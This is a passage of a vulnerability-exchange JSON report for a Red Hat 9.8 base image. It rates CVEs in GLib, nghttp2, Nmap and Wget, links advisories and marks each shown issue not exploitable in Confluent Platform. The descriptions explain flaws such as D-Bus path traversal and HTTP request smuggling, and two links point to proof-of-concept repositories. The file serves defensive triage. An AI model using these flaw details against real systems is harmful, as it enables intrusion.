          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        193
      ],
      "description": "A flaw was found in GLib. An off-by-one error can occur in the g_key_file_get_locale_string_list function in the gkeyfile.c file when loading a key file with an empty value. This flaw can cause an out-of-bounds access of 1 byte or a denial of service when the out-of-bounds access crosses a page boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58014"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58014"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-h88q-m8mm-7243"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3930"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58014.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58014"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58014"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-17T10:16:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58015",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        22
      ],
      "description": "A flaw was found in GLib. The D-Bus client-side implementation of the DBUS_COOKIE_SHA1 SASL authentication mechanism does not validate the cookie_context parameter received from the server. A malicious D-Bus server can supply a cookie_context containing path traversal sequences, causing the client to read an arbitrary file and exfiltrate sensitive data by verifying guessed file contents against a generated hash.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58015"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58015"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-hmpf-72wc-2r6x"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3931"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58015.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58015"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58015"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-17T10:16:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58055",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        444
      ],
      "description": "nghttp2's nghttpx proxy through 1.69.0 forwards an HTTP/1.1 Upgrade request that also carries a Content-Length header and body onto reusable keep-alive backend connections, re-adding the Upgrade and Connection headers while passing Content-Length verbatim. A backend that resolves the resulting ambiguous message in the attacker's favor enables HTTP request/response smuggling and cross-client response-queue poisoning.",
      "recommendation": "Upgrade libnghttp2 to version 1.43.0-6.el9_8.2",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58055"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54662"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55804"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58055"
        },
        {
          "url": "https://bugzilla.redhat.com/2493954"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2493954"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58055"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-54662.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55804"
        },
        {
          "url": "https://github.com/advisories/GHSA-xrr7-82jr-v58x"
        },
        {
          "url": "https://github.com/bikini/exploitarium/tree/main/nghttp2-nghttpx-upgrade-queue-poison-poc"
        },
        {
          "url": "https://github.com/nghttp2/nghttp2/commit/ab28105c4a0197da24f8bfc414bc116055249e1e"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58055.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55804.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58055"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8495-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58055"
        },
        {
          "url": "https://www.vulncheck.com/advisories/nghttp2-nghttpx-http-request-response-smuggling-via-upgrade-request-with-content-length"
        }
      ],
      "published": "2026-06-28T02:16:32+00:00",
      "updated": "2026-06-30T17:41:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.43.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libnghttp2@1.43.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-58058",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        191
      ],
      "description": "Nmap through 7.99 does not keep the IPv6 extension-header walk within the captured packet in ipv6_get_data_primitive (libnetutil/netutil.cc), so the pointer advances past the buffer and the remaining-length computation underflows to a large value. A scanned target or on-path attacker returning a crafted IPv6 response with a truncated extension header can trigger out-of-bounds reads and a crash during raw IPv6 scans.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58058"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58058"
        },
        {
          "url": "https://github.com/bikini/exploitarium/tree/main/nmap-ipv6-extlen-wrap-poc"
        },
        {
          "url": "https://github.com/nmap/nmap/commit/bb6754e76bb1686315008e1aa1c40202a513fb83"
        },
        {
          "url": "https://nmap.org/changelog.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58058"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58058"
        },
        {
          "url": "https://www.vulncheck.com/advisories/nmap-integer-underflow-in-ipv6-extension-header-parsing"
        }
      ],
      "published": "2026-06-28T02:16:33+00:00",
      "updated": "2026-06-30T17:31:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/nmap-ncat@7.92-5.el9?arch=x86_64&distro=redhat-9.8&epoch=3",
          "versions": [
            {
              "version": "3:7.92-5.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/nmap-ncat@7.92-5.el9?arch=x86_64&distro=redhat-9.8&epoch=3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58470",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "GNU Wget through 1.25.0, fixed in commit 43d3ba9, contains an integer overflow vulnerability in the parse_content_range() function within src/http.c that allows server-controlled values to cause signed integer arithmetic to overflow. Attackers can supply malicious Content-Range header values to trigger undefined behavior and download desynchronization in the affected client.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58470"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58470"
        },
        {
          "url": "https://github.com/advisories/GHSA-5f52-px6m-c5hw"
        },
        {
          "url": "https://gitlab.com/gnuwget/wget/-/commit/43d3ba9336bc94937e6fae2365c6ffd30c34ffcf"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58470"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58470"
        },
        {
          "url": "https://www.vulncheck.com/advisories/gnu-wget-integer-overflow-via-content-range-header-parsing"
        }
      ],
      "published": "2026-07-07T21:17:28+00:00",
      "updated": "2026-07-09T16:01:18+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-8.el9_4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58471",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        122
      ],
      "description": "GNU Wget through 1.25.0, fixed in commit c2640fe, contains a heap buffer overflow vulnerability in the convert_fname() function within src/url.c that allows remote attackers to trigger memory corruption through a server-supplied filename requiring character set conversion. When the output buffer is too small during iconv E2BIG reallocation, the reallocation logic miscalculates the remaining space, leading to a heap buffer overflow that can be exploited via a maliciously crafted server response.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58471"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58471"
        },
        {
          "url": "https://github.com/advisories/GHSA-vv88-699v-w5rh"
        },
        {
          "url": "https://gitlab.com/gnuwget/wget/-/commit/c2640fe5171c59f87c58dc9fcb195b2d18b010ee"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58471"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58471"
        },
        {
          "url": "https://www.vulncheck.com/advisories/gnu-wget-heap-buffer-overflow-via-convert-fname-in-url-c"
        }
      ],
      "published": "2026-07-07T21:17:28+00:00",
      "updated": "2026-07-09T16:02:07+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-8.el9_4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58472",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
